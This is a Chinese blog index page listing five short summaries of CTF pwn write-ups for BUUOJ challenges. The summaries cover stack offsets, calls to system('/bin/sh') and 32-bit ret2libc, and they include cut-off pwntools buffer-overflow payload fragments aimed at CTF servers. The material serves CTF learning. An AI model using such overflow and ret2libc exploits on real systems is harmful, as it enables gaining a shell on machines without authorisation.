摘要: 这题记到的东西就是直接调用函数找到call它的地方 找字符串可以用ROPgadget --binary 文件名 --string "sh" 点击查看代码 from pwn import * io=remote("node4.buuoj.cn",29939) io.recvuntil("/_/ /_/ 阅读全文
posted @ 2022-07-03 15:57 REPWNER 阅读(22) 评论(0) 推荐(0)
摘要: 这道题就是纸老虎 保护全开 看主程序 完成check就可以直接system('/bin/sh') check看一下 就是要等于这个玩意就是 可是看回主程序,这里输入的是v4,判断的v5,这里想起来了局部变量在栈上是按顺序排下来的,两个一个距离ebp是0x70一个是0x40减一下就好了 点击查看代码 阅读全文
posted @ 2022-07-03 15:43 REPWNER 阅读(23) 评论(0) 推荐(0)
摘要: 诶,这么简单的题还不能一次ac,易错点在于偏移ida的静态分析是错的 两个减一下 0x14 点击查看代码 from pwn import * io=remote("node4.buuoj.cn",28869) payload='a'*(0x14+0x4)+p32(0x804856D) io.send 阅读全文
posted @ 2022-07-03 01:55 REPWNER 阅读(35) 评论(0) 推荐(0)
摘要: 32位ret2libc 还是注意返回值得接返回地址后面 点击查看代码 from pwn import * io=remote("node4.buuoj.cn",29550) elf=ELF("./bof") write_plt=elf.plt['write'] write_got=elf.got[' 阅读全文
posted @ 2022-07-03 01:36 REPWNER 阅读(4) 评论(0) 推荐(0)
摘要: 记住给一个返回地址 一个溢出点溢出到这个函数,然后给两个参数直接给就好 点击查看代码 from pwn import * io=remote("node4.buuoj.cn",29294) io.recvuntil("Please enter your string: ") payload='a'* 阅读全文
posted @ 2022-07-03 01:15 REPWNER 阅读(19) 评论(0) 推荐(0)